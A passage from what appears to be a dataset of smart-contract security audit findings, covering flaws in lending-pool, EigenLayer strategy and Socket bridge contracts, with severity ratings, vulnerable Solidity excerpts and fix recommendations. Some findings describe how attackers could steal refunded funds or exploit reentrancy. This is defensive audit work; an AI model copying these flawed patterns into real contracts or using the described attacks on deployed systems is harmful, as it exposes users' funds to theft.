the assets before emitting the event. While this is fine in a lot of cases, that will not always be true. The result of `previewMint` and `convertToAssets` will only be equal while the `totalAssets` and `totalSupply` are equal. For example, this assumption will break after the first liquidation.\\n```\\nfunction mint(uint256 shares, address receiver) public isOpen returns (uint256 assets) {\\n if(shares == 0) revert InvalidParams();\\n // These transfers need to happen before the mint, and this is forcing a higher degree of coupling than is ideal\\n assets = previewMint(shares);\\n asset.transferFrom(msg.sender, address(this), assets);\\n liquidStakingToken.mint(receiver, shares);\\n assets = convertToAssets(shares);\\n emit Deposit(msg.sender, receiver, assets, shares);\\n}\\n```\\nчUse the `assets` value computed by the `previewMint` when emitting the event.чч```\\nfunction mint(uint256 shares, address receiver) public isOpen returns (uint256 assets) {\\n if(shares == 0) revert InvalidParams();\\n // These transfers need to happen before the mint, and this is forcing a higher degree of coupling than is ideal\\n assets = previewMint(shares);\\n asset.transferFrom(msg.sender, address(this), assets);\\n liquidStakingToken.mint(receiver, shares);\\n assets = convertToAssets(shares);\\n emit Deposit(msg.sender, receiver, assets, shares);\\n}\\n```\\n -Potential Overpayment Due to Rounding Imprecision Won't FixчlowчInside the `InifintyPool` the `pay` function might accept unaccounted files. Imagine a situation where an Agent is trying to repay only the fees portion of the debt. In that case, the following branch will be executed:\\n```\\nif (vc.value <= interestOwed) {\\n // compute the amount of epochs this payment covers\\n // vc.value is not WAD yet, so divWadDown cancels the extra WAD in interestPerEpoch\\n uint256 epochsForward = vc.value.divWadDown(interestPerEpoch);\\n // update the account's `epochsPaid` cursor\\n account.epochsPaid += epochsForward;\\n // since the entire payment is interest, the entire payment is used to compute the fee (principal payments are fee-free)\\n feeBasis = vc.value;\\n} else {\\n```\\n\\nThe issue is if the `value` does not divide by the `interestPerEpoch` exactly, any remainder will remain in the InfinityPool.\\n```\\nuint256 epochsForward = vc.value.divWadDown(interestPerEpoch);\\n```\\nчSince the remainder will most likely not be too large this is not critical, but ideally, those remaining funds would be included in the `refund` variable.чч```\\nif (vc.value <= interestOwed) {\\n // compute the amount of epochs this payment covers\\n // vc.value is not WAD yet, so divWadDown cancels the extra WAD in interestPerEpoch\\n uint256 epochsForward = vc.value.divWadDown(interestPerEpoch);\\n // update the account's `epochsPaid` cursor\\n account.epochsPaid += epochsForward;\\n // since the entire payment is interest, the entire payment is used to compute the fee (principal payments are fee-free)\\n feeBasis = vc.value;\\n} else {\\n```\\n -jumpStartAccount Should Be Subject to the Same Approval Checks as Regular Borrow.чlowч`InfinityPool` contract has the ability to kick start an account that will have a debt position in this pool.\\n```\\nfunction jumpStartAccount(address receiver, uint256 agentID, uint256 accountPrincipal) external onlyOwner {\\n Account memory account = \\_getAccount(agentID);\\n // if the account is already initialized, revert\\n if (account.principal != 0) revert InvalidState();\\n // create the account\\n account.principal = accountPrincipal;\\n account.startEpoch = block.number;\\n account.epochsPaid = block.number;\\n // save the account\\n account.save(router, agentID, id);\\n // add the pool to the agent's list of borrowed pools\\n GetRoute.agentPolice(router).addPoolToList(agentID, id);\\n // mint the iFIL to the receiver, using principal as the deposit amount\\n liquidStakingToken.mint(receiver, convertToShares(accountPrincipal));\\n // account for the new principal in the total borrowed of the pool\\n totalBorrowed += accountPrincipal;\\n}\\n```\\nчWe suggest that this action is subject to the same rules as the standard borrow action. Thus checks on DTE, LTV and DTI should be done if possible.чч```\\nfunction jumpStartAccount(address receiver, uint256 agentID, uint256 accountPrincipal) external onlyOwner {\\n Account memory account = \\_getAccount(agentID);\\n // if the account is already initialized, revert\\n if (account.principal != 0) revert InvalidState();\\n // create the account\\n account.principal = accountPrincipal;\\n account.startEpoch = block.number;\\n account.epochsPaid = block.number;\\n // save the account\\n account.save(router, agentID, id);\\n // add the pool to the agent's list of borrowed pools\\n GetRoute.agentPolice(router).addPoolToList(agentID, id);\\n // mint the iFIL to the receiver, using principal as the deposit amount\\n liquidStakingToken.mint(receiver, convertToShares(accountPrincipal));\\n // account for the new principal in the total borrowed of the pool\\n totalBorrowed += accountPrincipal;\\n}\\n```\\n -Potential Reentrancy Into StrategiesчmediumчThe `StrategyManager` contract is the entry point for deposits into and withdrawals from strategies. More specifically, to `deposit` into a strategy, a staker calls `depositIntoStrategy` (or anyone calls `depositIntoStrategyWithSignature` with the staker's signature) then the asset is transferred from the staker to the strategy contract. After that, the strategy's `deposit` function is called, followed by some bookkeeping in the `StrategyManager`. For withdrawals (and slashing), the `StrategyManager` calls the strategy's `withdraw` function, which transfers the given amount of the asset to the given recipient. Both token transfers are a potential source of reentrancy if the token allows it.\\nThe `StrategyManager` uses OpenZeppelin's `ReentrancyGuardUpgradeable` as reentrancy protection, and the relevant functions have a `nonReentrant` modifier. The `StrategyBase` contract - from which concrete strategies should be derived - does not have reentrancy protection. However, the functions `deposit` and `withdraw` can only be called from the `StrategyManager`, so reentering these is impossible.\\nNevertheless, other functions could be reentered, for example, `sharesToUnderlyingView` and `underlyingToSharesView`, as well as their (supposedly) non-view counterparts.\\nLet's look at the `withdraw` function in `StrategyBase`. First, the `amountShares` shares are burnt, and at the end of the function, the equivalent amount of `token` is transferred to the depositor:\\n```\\nfunction withdraw(address depositor, IERC20 token, uint256 amountShares)\\n external\\n virtual\\n override\\n onlyWhenNotPaused(PAUSED\\_WITHDRAWALS)\\n onlyStrategyManager\\n{\\n require(token == underlyingToken, \"StrategyBase.withdraw: Can only withdraw the strategy token\");\\n // copy `totalShares` value to memory, prior to any decrease\\n uint256 priorTotalShares = totalShares;\\n require(\\n amountShares <= priorTotalShares,\\n \"StrategyBase.withdraw: amountShares must be less than or equal to totalShares\"\\n );\\n\\n // Calculate the value that `totalShares` will decrease to as a result of the withdrawal\\n uint256 updatedTotalShares = priorTotalShares - amountShares;\\n // check to avoid edge case where share rate can be massively inflated as a 'griefing' sort of attack\\n require(updatedTotalShares >= MIN\\_NONZERO\\_TOTAL\\_SHARES || updatedTotalShares == 0,\\n \"StrategyBase.withdraw: updated totalShares amount would be nonzero but below MIN\\_NONZERO\\_TOTAL\\_SHARES\");\\n // Actually decrease the `totalShares` value\\n totalShares = updatedTotalShares;\\n\\n /\\*\\*\\n \\* @notice calculation of amountToSend \\*mirrors\\* `sharesToUnderlying(amountShares)`, but is different since the `totalShares` has already\\n \\* been decremented. Specifically, notice how we use `priorTotalShares` here instead of `totalShares`.\\n \\*/\\n uint256 amountToSend;\\n if (priorTotalShares == amountShares) {\\n amountToSend = \\_tokenBalance();\\n } else {\\n amountToSend = (\\_tokenBalance() \\* amountShares) / priorTotalShares;\\n }\\n\\n underlyingToken.safeTransfer(depositor, amountToSend);\\n}\\n```\\n\\nIf we assume that the `token` contract has a callback to the recipient of the transfer before the actual balance changes take place, then the recipient could reenter the strategy contract, for example, in sharesToUnderlyingView:\\n```\\nfunction sharesToUnderlyingView(uint256 amountShares) public view virtual override returns (uint256) {\\n if (totalShares == 0) {\\n return amountShares;\\n } else {\\n return (\\_tokenBalance() \\* amountShares) / totalShares;\\n }\\n}\\n```\\n\\nThe crucial point is: If the callback is executed before the actual balance change, then `sharesToUnderlyingView` will report a bad result because the shares have already been burnt. Still, the token balance has not been updated yet.\\nFor deposits, the token transfer to the strategy happens first, and the shares are minted after that:\\n```\\nfunction \\_depositIntoStrategy(address depositor, IStrategy strategy, IERC20 token, uint256 amount)\\n internal\\n onlyStrategiesWhitelistedForDeposit(strategy)\\n returns (uint256 shares)\\n{\\n // transfer tokens from the sender to the strategy\\n token.safeTransferFrom(msg.sender, address(strategy), amount);\\n\\n // deposit the assets into the specified strategy and get the equivalent amount of shares in that strategy\\n shares = strategy.deposit(token, amount);\\n```\\n\\n```\\nfunction deposit(IERC20 token, uint256 amount)\\n external\\n virtual\\n override\\n onlyWhenNotPaused(PAUSED\\_DEPOSITS)\\n onlyStrategyManager\\n returns (uint256 newShares)\\n{\\n require(token == underlyingToken, \"StrategyBase.deposit: Can only deposit underlyingToken\");\\n\\n /\\*\\*\\n \\* @notice calculation of newShares \\*mirrors\\* `underlyingToShares(amount)`, but is different since the balance of `underlyingToken`\\n \\* has already been increased due to the `strategyManager` transferring tokens to this strategy prior to calling this function\\n \\*/\\n uint256 priorTokenBalance = \\_tokenBalance() - amount;\\n if (priorTokenBalance == 0 || totalShares == 0) {\\n newShares = amount;\\n } else {\\n newShares = (amount \\* totalShares) / priorTokenBalance;\\n }\\n\\n // checks to ensure correctness / avoid edge case where share rate can be massively inflated as a 'griefing' sort of attack\\n require(newShares != 0, \"StrategyBase.deposit: newShares cannot be zero\");\\n uint256 updatedTotalShares = totalShares + newShares;\\n require(updatedTotalShares >= MIN\\_NONZERO\\_TOTAL\\_SHARES,\\n \"StrategyBase.deposit: updated totalShares amount would be nonzero but below MIN\\_NONZERO\\_TOTAL\\_SHARES\");\\n\\n // update total share amount\\n totalShares = updatedTotalShares;\\n return newShares;\\n}\\n```\\n\\nThat means if there is a callback in the token's `transferFrom` function and it is executed after the balance change, a reentering call to `sharesToUnderlyingView` (for example) will again return a wrong result because shares and token balances are not “in sync.”\\nIn addition to the reversed order of token transfer and shares update, there's another vital difference between `withdraw` and deposit: For withdrawals, the call to the token contract originates in the strategy, while for deposits, it is the strategy manager that initiates the call to the token contract (before calling into the strategy). That's a technicality that has consequences for reentrancy protection: Note that for withdrawals, it is the strategy contract that is reentered, while for deposits, there is not a single contract that is reentered; instead, it is the contract system that is in an inconsistent state when the reentrancy happens. Hence, reentrancy protection on the level of individual contracts is not sufficient.\\nFinally, we want to discuss though which functions in the strategy contract the system could be reentered. As mentioned, `deposit` and `withdraw` can only be called by the strategy manager, so these two can be ruled out. For the examples above, we considered `sharesToUnderlyingView`, which (as the name suggests) is a `view` function. As such, it can't change the state of the contract, so reentrancy through a `view` function can only be a problem for other contracts that use this function and rely on its return value. However, there is also a potentially state-changing variant, `sharesToUnderlying`, and similar potentially state-changing functions, such as `underlyingToShares` and `userUnderlying`. Currently, these functions are not actually state-changing, but the idea is that they could be and, in some concrete strategy implementations that inherit from `StrategyBase`, will be. In such cases, these functions could make wrong state changes due to state inconsistency during reentrancy.\\nThe examples above assume that the token contract allows reentrancy through its `transfer` function before the balance change has been made or in its `transferFrom` function after. It might be tempting to argue that tokens which don't fall into this category are safe to use. While the examples discussed above are the most interesting attack vectors we found, there might still be others: To illustrate this point, assume a token contract that allows reentrancy through `transferFrom` only before any state change in the token takes place. The token `transfer` is the first thing that happens in `StrategyManager._depositIntoStrategy`, and the state changes (user shares) and calling the strategy's `deposit` function occur later, this might look safe. However, if the `deposit` happens via `StrategyManager.depositIntoStrategyWithSignature`, then it can be seen, for example, that the staker's nonce is updated before the internal `_depositIntoStrategy` function is called:\\n```\\nfunction depositIntoStrategyWithSignature(\\n IStrategy strategy,\\n IERC20 token,\\n uint256 amount,\\n address staker,\\n uint256 expiry,\\n bytes memory signature\\n)\\n external\\n onlyWhenNotPaused(PAUSED\\_DEPOSITS)\\n onlyNotFrozen(staker)\\n nonReentrant\\n returns (uint256 shares)\\n{\\n require(\\n expiry >= block.timestamp,\\n \"StrategyManager.depositIntoStrategyWithSignature: signature expired\"\\n );\\n // calculate struct hash, then increment `staker`'s nonce\\n uint256 nonce = nonces[staker];\\n bytes32 structHash = keccak256(abi.encode(DEPOSIT\\_TYPEHASH, strategy, token, amount, nonce, expiry));\\n unchecked {\\n nonces[staker] = nonce + 1;\\n }\\n bytes32 digestHash = keccak256(abi.encodePacked(\"\\x19\\x01\", DOMAIN\\_SEPARATOR, structHash));\\n\\n\\n /\\*\\*\\n \\* check validity of signature:\\n \\* 1) if `staker` is an EOA, then `signature` must be a valid ECSDA signature from `staker`,\\n \\* indicating their intention for this action\\n \\* 2) if `staker` is a contract, then `signature` must will be checked according to EIP-1271\\n \\*/\\n if (Address.isContract(staker)) {\\n require(IERC1271(staker).isValidSignature(digestHash, signature) == ERC1271\\_MAGICVALUE,\\n \"StrategyManager.depositIntoStrategyWithSignature: ERC1271 signature verification failed\");\\n } else {\\n require(ECDSA.recover(digestHash, signature) == staker,\\n \"StrategyManager.depositIntoStrategyWithSignature: signature not from staker\");\\n }\\n\\n shares = \\_depositIntoStrategy(staker, strategy, token, amount);\\n}\\n```\\n\\nHence, querying the staker's nonce in reentrancy would still give a result based on an “incomplete state change.” It is, for example, conceivable that the staker still has zero shares, and yet their nonce is already 1. This particular situation is most likely not an issue, but the example shows that reentrancy can be subtle.чThis is fine if the token doesn't allow reentrancy in the first place. As discussed above, among the tokens that do allow reentrancy, some variants of when reentrancy can happen in relation to state changes in the token seem more dangerous than others, but we have also argued that this kind of reasoning can be dangerous and error-prone. Hence, we recommend employing comprehensive and defensive reentrancy protection based on reentrancy guards such as OpenZeppelin's ReentrancyGuardUpgradeable, which is already used in the `StrategyManager`.\\nUnfortunately, securing a multi-contract system against reentrancy can be challenging, but we hope the preceding discussion and the following pointers will prove helpful:\\nExternal functions in strategies that should only be callable by the strategy manager (such as `deposit` and withdraw) should have the `onlyStrategyManager` modifier. This is already the case in the current codebase and is listed here only for completeness.\\nExternal functions in strategies for which item 1 doesn't apply (such as `sharesToUnderlying` and underlyingToShares) should query the strategy manager's reentrancy lock and revert if it is set.\\nIn principle, the restrictions above also apply to `public` functions, but if a `public` function is also used internally, checks against reentrancy can cause problems (if used in an `internal` context) or at least be redundant. In the context of reentrancy protection, it is often easier to split `public` functions into an `internal` and an `external` one.\\nIf `view` functions are supposed to give reliable results (either internally - which is typically the case - or for other contracts), they have to be protected too.\\nThe previous item also applies to the StrategyManager: `view` functions that provide correct results should query the reentrancy lock and revert if it is set.\\nSolidity automatically generates getters for `public` state variables. Again, if these (external view) functions must deliver correct results, the same measures must be taken for explicit `view` functions. In practice, the state variable has to become `internal` or `private`, and the getter function must be hand-written.\\nThe `StrategyBase` contract provides some basic functionality. Concrete strategy implementations can inherit from this contract, meaning that some functions may be overridden (and might or might not call the overridden version via super), and new functions might be added. While the guidelines above should be helpful, derived contracts must be reviewed and assessed separately on a case-by-case basis. As mentioned before, reentrancy protection can be challenging, especially in a multi-contract system.чч```\\nfunction withdraw(address depositor, IERC20 token, uint256 amountShares)\\n external\\n virtual\\n override\\n onlyWhenNotPaused(PAUSED\\_WITHDRAWALS)\\n onlyStrategyManager\\n{\\n require(token == underlyingToken, \"StrategyBase.withdraw: Can only withdraw the strategy token\");\\n // copy `totalShares` value to memory, prior to any decrease\\n uint256 priorTotalShares = totalShares;\\n require(\\n amountShares <= priorTotalShares,\\n \"StrategyBase.withdraw: amountShares must be less than or equal to totalShares\"\\n );\\n\\n // Calculate the value that `totalShares` will decrease to as a result of the withdrawal\\n uint256 updatedTotalShares = priorTotalShares - amountShares;\\n // check to avoid edge case where share rate can be massively inflated as a 'griefing' sort of attack\\n require(updatedTotalShares >= MIN\\_NONZERO\\_TOTAL\\_SHARES || updatedTotalShares == 0,\\n \"StrategyBase.withdraw: updated totalShares amount would be nonzero but below MIN\\_NONZERO\\_TOTAL\\_SHARES\");\\n // Actually decrease the `totalShares` value\\n totalShares = updatedTotalShares;\\n\\n /\\*\\*\\n \\* @notice calculation of amountToSend \\*mirrors\\* `sharesToUnderlying(amountShares)`, but is different since the `totalShares` has already\\n \\* been decremented. Specifically, notice how we use `priorTotalShares` here instead of `totalShares`.\\n \\*/\\n uint256 amountToSend;\\n if (priorTotalShares == amountShares) {\\n amountToSend = \\_tokenBalance();\\n } else {\\n amountToSend = (\\_tokenBalance() \\* amountShares) / priorTotalShares;\\n }\\n\\n underlyingToken.safeTransfer(depositor, amountToSend);\\n}\\n```\\n -StrategyBase - Inflation Attack Prevention Can Lead to Stuck FundsчlowчAs a defense against what has come to be known as inflation or donation attack in the context of ERC-4626, the `StrategyBase` contract - from which concrete strategy implementations are supposed to inherit - enforces that the amount of shares in existence for a particular strategy is always either 0 or at least a certain minimum amount that is set to 10^9. This mitigates inflation attacks, which require a small total supply of shares to be effective.\\n```\\nuint256 updatedTotalShares = totalShares + newShares;\\nrequire(updatedTotalShares >= MIN\\_NONZERO\\_TOTAL\\_SHARES,\\n \"StrategyBase.deposit: updated totalShares amount would be nonzero but below MIN\\_NONZERO\\_TOTAL\\_SHARES\");\\n```\\n\\n```\\n// Calculate the value that `totalShares` will decrease to as a result of the withdrawal\\nuint256 updatedTotalShares = priorTotalShares - amountShares;\\n// check to avoid edge case where share rate can be massively inflated as a 'griefing' sort of attack\\nrequire(updatedTotalShares >= MIN\\_NONZERO\\_TOTAL\\_SHARES || updatedTotalShares == 0,\\n \"StrategyBase.withdraw: updated totalShares amount would be nonzero but below MIN\\_NONZERO\\_TOTAL\\_SHARES\");\\n```\\n\\nThis particular approach has the downside that, in the worst case, a user may be unable to withdraw the underlying asset for up to 10^9 - 1 shares. While the extreme circumstances under which this can happen might be unlikely to occur in a realistic setting and, in many cases, the value of 10^9 - 1 shares may be negligible, this is not ideal.чIt isn't easy to give a good general recommendation. None of the suggested mitigations are without a downside, and what's the best choice may also depend on the specific situation. We do, however, feel that alternative approaches that can't lead to stuck funds might be worth considering, especially for a default implementation.\\nOne option is internal accounting, i.e., the strategy keeps track of the number of underlying tokens it owns. It uses this number for conversion rate calculation instead of its balance in the token contract. This avoids the donation attack because sending tokens directly to the strategy will not affect the conversion rate. Moreover, this technique helps prevent reentrancy issues when the EigenLayer state is out of sync with the token contract's state. The downside is higher gas costs and that donating by just sending tokens to the contract is impossible; more specifically, if it happens accidentally, the funds are lost unless there's some special mechanism to recover them.\\nAn alternative approach with virtual shares and assets is presented here, and the document lists pointers to more discussions and proposed solutions.чч```\\nuint256 updatedTotalShares = totalShares + newShares;\\nrequire(updatedTotalShares >= MIN\\_NONZERO\\_TOTAL\\_SHARES,\\n \"StrategyBase.deposit: updated totalShares amount would be nonzero but below MIN\\_NONZERO\\_TOTAL\\_SHARES\");\\n```\\n -StrategyWrapper - Functions Shouldn't Be virtual (Out of Scope)чlowчThe `StrategyWrapper` contract is a straightforward strategy implementation and - as its NatSpec documentation explicitly states - is not designed to be inherited from:\\n```\\n/\\*\\*\\n \\* @title Extremely simple implementation of `IStrategy` interface.\\n \\* @author Layr Labs, Inc.\\n \\* @notice Simple, basic, \"do-nothing\" Strategy that holds a single underlying token and returns it on withdrawals.\\n \\* Assumes shares are always 1-to-1 with the underlyingToken.\\n \\* @dev Unlike `StrategyBase`, this contract is \\*not\\* designed to be inherited from.\\n \\* @dev This contract is expressly \\*not\\* intended for use with 'fee-on-transfer'-type tokens.\\n \\* Setting the `underlyingToken` to be a fee-on-transfer token may result in improper accounting.\\n \\*/\\ncontract StrategyWrapper is IStrategy {\\n```\\n\\nHowever, all functions in this contract are `virtual`, which only makes sense if inheriting from `StrategyWrapper` is possible.чAssuming the NatSpec documentation is correct, and no contract should inherit from `StrategyWrapper`, remove the `virtual` keyword from all function definitions. Otherwise, fix the documentation.\\nRemark\\nThis contract is out of scope, and this finding is only included because we noticed it accidentally. This does not mean we have reviewed the contract or other out-of-scope files.чч```\\n/\\*\\*\\n \\* @title Extremely simple implementation of `IStrategy` interface.\\n \\* @author Layr Labs, Inc.\\n \\* @notice Simple, basic, \"do-nothing\" Strategy that holds a single underlying token and returns it on withdrawals.\\n \\* Assumes shares are always 1-to-1 with the underlyingToken.\\n \\* @dev Unlike `StrategyBase`, this contract is \\*not\\* designed to be inherited from.\\n \\* @dev This contract is expressly \\*not\\* intended for use with 'fee-on-transfer'-type tokens.\\n \\* Setting the `underlyingToken` to be a fee-on-transfer token may result in improper accounting.\\n \\*/\\ncontract StrategyWrapper is IStrategy {\\n```\\n -StrategyBase - Inheritance-Related IssuesчlowчA. The `StrategyBase` contract defines `view` functions that, given an amount of shares, return the equivalent amount of tokens (sharesToUnderlyingView) and vice versa (underlyingToSharesView). These two functions also have non-view counterparts: `sharesToUnderlying` and `underlyingToShares`, and their NatSpec documentation explicitly states that they should be allowed to make state changes. Given the scope of this engagement, it is unclear if these non-view versions are needed, but assuming they are, this does currently not work as intended.\\nFirst, the interface `IStrategy` declares `underlyingToShares` as `view` (unlike sharesToUnderlying). This means overriding this function in derived contracts is impossible without the `view` modifier. Hence, in `StrategyBase` - which implements the `IStrategy` interface - this (virtual) function is (and has to be) `view`. The same applies to overridden versions of this function in contracts inherited from `StrategyBase`.\\n```\\n/\\*\\*\\n \\* @notice Used to convert an amount of underlying tokens to the equivalent amount of shares in this strategy.\\n \\* @notice In contrast to `underlyingToSharesView`, this function \\*\\*may\\*\\* make state modifications\\n \\* @param amountUnderlying is the amount of `underlyingToken` to calculate its conversion into strategy shares\\n \\* @dev Implementation for these functions in particular may vary signifcantly for different strategies\\n \\*/\\nfunction underlyingToShares(uint256 amountUnderlying) external view returns (uint256);\\n```\\n\\n```\\n/\\*\\*\\n \\* @notice Used to convert an amount of underlying tokens to the equivalent amount of shares in this strategy.\\n \\* @notice In contrast to `underlyingToSharesView`, this function \\*\\*may\\*\\* make state modifications\\n \\* @param amountUnderlying is the amount of `underlyingToken` to calculate its conversion into strategy shares\\n \\* @dev Implementation for these functions in particular may vary signifcantly for different strategies\\n \\*/\\nfunction underlyingToShares(uint256 amountUnderlying) external view virtual returns (uint256) {\\n return underlyingToSharesView(amountUnderlying);\\n}\\n```\\n\\nAs mentioned above, the `sharesToUnderlying` function does not have the `view` modifier in the interface `IStrategy`. However, the overridden (and virtual) version in `StrategyBase` does, which means again that overriding this function in contracts inherited from `StrategyBase` is impossible without the `view` modifier.\\n```\\n/\\*\\*\\n \\* @notice Used to convert a number of shares to the equivalent amount of underlying tokens for this strategy.\\n \\* @notice In contrast to `sharesToUnderlyingView`, this function \\*\\*may\\*\\* make state modifications\\n \\* @param amountShares is the amount of shares to calculate its conversion into the underlying token\\n \\* @dev Implementation for these functions in particular may vary signifcantly for different strategies\\n \\*/\\nfunction sharesToUnderlying(uint256 amountShares) public view virtual override returns (uint256) {\\n return sharesToUnderlyingView(amountShares);\\n}\\n```\\n\\nB. The `initialize` function in the `StrategyBase` contract is not virtual, which means the name will not be available in derived contracts (unless with different parameter types). It also has the `initializer` modifier, which is unavailable in concrete strategies inherited from `StrategyBase`.чA. If state-changing versions of the conversion functions are needed, the `view` modifier has to be removed from `IStrategy.underlyingToShares`, `StrategyBase.underlyingToShares`, and `StrategyBase.sharesToUnderlying`. They should be removed entirely from the interface and base contract if they're not needed.\\nB. Consider making the `StrategyBase` contract `abstract`, maybe give the `initialize` function a more specific name such as `_initializeStrategyBase`, change its visibility to `internal`, and use the `onlyInitializing` modifier instead of `initializer`.чч```\\n/\\*\\*\\n \\* @notice Used to convert an amount of underlying tokens to the equivalent amount of shares in this strategy.\\n \\* @notice In contrast to `underlyingToSharesView`, this function \\*\\*may\\*\\* make state modifications\\n \\* @param amountUnderlying is the amount of `underlyingToken` to calculate its conversion into strategy shares\\n \\* @dev Implementation for these functions in particular may vary signifcantly for different strategies\\n \\*/\\nfunction underlyingToShares(uint256 amountUnderlying) external view returns (uint256);\\n```\\n -StrategyManager - Cross-Chain Replay Attacks After Chain Split Due to Hard-Coded DOMAIN_SEPARATORчlowчA. The `StrategyManager` contract allows stakers to deposit into and withdraw from strategies. A staker can either deposit themself or have someone else do it on their behalf, where the latter requires an EIP-712-compliant signature. The EIP-712 domain separator is computed in the `initialize` function and stored in a state variable for later retrieval:\\n```\\n/// @notice EIP-712 Domain separator\\nbytes32 public DOMAIN\\_SEPARATOR;\\n```\\n\\n```\\nfunction initialize(address initialOwner, address initialStrategyWhitelister, IPauserRegistry \\_pauserRegistry, uint256 initialPausedStatus, uint256 \\_withdrawalDelayBlocks)\\n external\\n initializer\\n{\\n DOMAIN\\_SEPARATOR = keccak256(abi.encode(DOMAIN\\_TYPEHASH, bytes(\"EigenLayer\"), block.chainid, address(this)));\\n```\\n\\nOnce set in the `initialize` function, the value can't be changed anymore. In particular, the chain ID is “baked into” the `DOMAIN_SEPARATOR` during initialization. However, it is not necessarily constant: In the event of a chain split, only one of the resulting chains gets to keep the original chain ID, and the other should use a new one. With the current approach to compute the `DOMAIN_SEPARATOR` during initialization, store it, and then use the stored value for signature verification, a signature will be valid on both chains after a split - but it should not be valid on the chain with the new ID. Hence, the domain separator should be computed dynamically.\\nB. The `name` in the `EIP712Domain` is of type string:\\n```\\nbytes32 public constant DOMAIN\\_TYPEHASH =\\n keccak256(\"EIP712Domain(string name,uint256 chainId,address verifyingContract)\");\\n```\\n\\nWhat's encoded when the domain separator is computed is bytes(\"EigenLayer\"):\\n```\\nDOMAIN\\_SEPARATOR = keccak256(abi.encode(DOMAIN\\_TYPEHASH, bytes(\"EigenLayer\"), block.chainid, address(this)));\\n```\\n\\nAccording to EIP-712,\\nThe dynamic values `bytes` and `string` are encoded as a `keccak256` hash of their contents.\\nHence, `bytes(\"EigenLayer\")` should be replaced with `keccak256(bytes(\"EigenLayer\"))`.\\nC. The `EIP712Domain` does not include a version string:\\n```\\nbytes32 public constant DOMAIN\\_TYPEHASH =\\n keccak256(\"EIP712Domain(string name,uint256 chainId,address verifyingContract)\");\\n```\\n\\nThat is allowed according to the specification. However, given that most, if not all, projects, as well as OpenZeppelin's EIP-712 implementation, do include a version string in their `EIP712Domain`, it might be a pragmatic choice to do the same, perhaps to avoid potential incompatibilities.чIndividual recommendations have been given above. Alternatively, you might want to utilize OpenZeppelin's `EIP712Upgradeable` library, which will take care of these issues. Note that some of these changes will break existing signatures.чч```\\n/// @notice EIP-712 Domain separator\\nbytes32 public DOMAIN\\_SEPARATOR;\\n```\\n -StrategyManagerStorage - Miscalculated Gap SizeчlowчUpgradeable contracts should have a “gap” of unused storage slots at the end to allow for adding state variables when the contract is upgraded. The convention is to have a gap whose size adds up to 50 with the used slots at the beginning of the contract's storage.\\nIn `StrategyManagerStorage`, the number of consecutively used storage slots is 10:\\n`DOMAIN_SEPARATOR`\\n`nonces`\\n`strategyWhitelister`\\n`withdrawalDelayBlocks`\\n`stakerStrategyShares`\\n`stakerStrategyList`\\n`withdrawalRootPending`\\n`numWithdrawalsQueued`\\n`strategyIsWhitelistedForDeposit`\\n`beaconChainETHSharesToDecrementOnWithdrawal`\\nHowever, the gap size in the storage contract is 41:\\n```\\nuint256[41] private \\_\\_gap;\\n```\\nчIf you don't have to maintain compatibility with an existing deployment, we recommend reducing the storage gap size to 40. Otherwise, we recommend adding a comment explaining that, in this particular case, the gap size and the used storage slots should add up to 51 instead of 50 and that this invariant has to be maintained in future versions of this contract.чч```\\nuint256[41] private \\_\\_gap;\\n```\\n -Funds Refunded From Celer Bridge Might Be Stolenчhighч```\\nif (!router.withdraws(transferId)) {\\n router.withdraw(\\_request, \\_sigs, \\_signers, \\_powers);\\n}\\n```\\n\\nFrom the point of view of the Celer bridge, the initial depositor of the tokens is the `SocketGateway`. As a consequence, the Celer contract transfers the tokens to be refunded to the gateway. The gateway is then in charge of forwarding the tokens to the initial depositor. To achieve this, it keeps a mapping of unique transfer IDs to depositor addresses. Once a refund is processed, the corresponding address in the mapping is reset to the zero address.\\nLooking at the `withdraw` function of the Celer pool, we see that for some tokens, it is possible that the reimbursement will not be processed directly, but only after some delay. From the gateway point of view, the reimbursement will be marked as successful, and the address of the original sender corresponding to this transfer ID will be reset to address(0).\\n```\\nif (delayThreshold > 0 && wdmsg.amount > delayThreshold) {\\n _addDelayedTransfer(wdId, wdmsg.receiver, wdmsg.token, wdmsg. // <--- here\\n} else {\\n _sendToken(wdmsg.receiver, wdmsg.token, wdmsg.\\n}\\n```\\n\\nIt is then the responsibility of the user, once the locking delay has passed, to call another function to claim the tokens. Unfortunately, in our case, this means that the funds will be sent back to the gateway contract and not to the original sender. Because the gateway implements `rescueEther`, and `rescueFunds` functions, the admin might be able to send the funds back to the user. However, this requires manual intervention and breaks the trustlessness assumptions of the system. Also, in that case, there is no easy way to trace back the original address of the sender, that corresponds to this refund.\\nHowever, there is an additional issue that might allow an attacker to steal some funds from the gateway. Indeed, when claiming the refund, if it is in ETH, the gateway will have some balance when the transaction completes. Any user can then call any function that consumes the gateway balance, such as the `swapAndBridge` from `CelerImpl`, to steal the refunded ETH. That is possible as the function relies on a user-provided amount as an input, and not on `msg.value`. Additionally, if the refund is an ERC-20, an attacker can steal the funds by calling `bridgeAfterSwap` or `swapAndBridge` from the `Stargate` or `Celer` routes with the right parameters.\\n```\\nfunction bridgeAfterSwap(\\n uint256 amount,\\n bytes calldata bridgeData\\n) external payable override {\\n CelerBridgeData memory celerBridgeData = abi.decode(\\n bridgeData,\\n (CelerBridgeData)\\n );\\n```\\n\\n```\\nfunction swapAndBridge(\\n uint32 swapId,\\n bytes calldata swapData,\\n StargateBridgeDataNoToken calldata stargateBridgeData\\n```\\n\\nNote that this violates the security assumption: “The contracts are not supposed to hold any funds post-tx execution.”чMake sure that `CelerImpl` supports also the delayed withdrawals functionality and that withdrawal requests are deleted only if the receiver has received the withdrawal in a single transaction.чч```\\nif (!router.withdraws(transferId)) {\\n router.withdraw(\\_request, \\_sigs, \\_signers, \\_powers);\\n}\\n```\\n -Calls Made to Non-Existent/Removed Routes or Controllers Will Not Result in FailureчhighчThis issue was found in commit hash `a8d0ad1c280a699d88dc280d9648eacaf215fb41`.\\nIn the Ethereum Virtual Machine (EVM), `delegatecall` will succeed for calls to externally owned accounts and more specifically to the zero address, which presents a potential security risk. We have identified multiple instances of `delegatecall` being used to invoke smart contract functions.\\nThis, combined with the fact that routes can be removed from the system by the owner of the `SocketGateway` contract using the `disableRoute` function, makes it possible for the user's funds to be lost in case of an `executeRoute` transaction (for instance) that's waiting in the mempool is eventually being front-ran by a call to `disableRoute`.\\n```\\n(bool success, bytes memory result) = addressAt(routeId).delegatecall(\\n```\\n\\n```\\n.delegatecall(swapData);\\n```\\n\\n```\\n.delegatecall(swapData);\\n```\\n\\n```\\n.delegatecall(swapData);\\n```\\n\\n```\\n.delegatecall(data);\\n```\\n\\nEven after the upgrade to commit hash 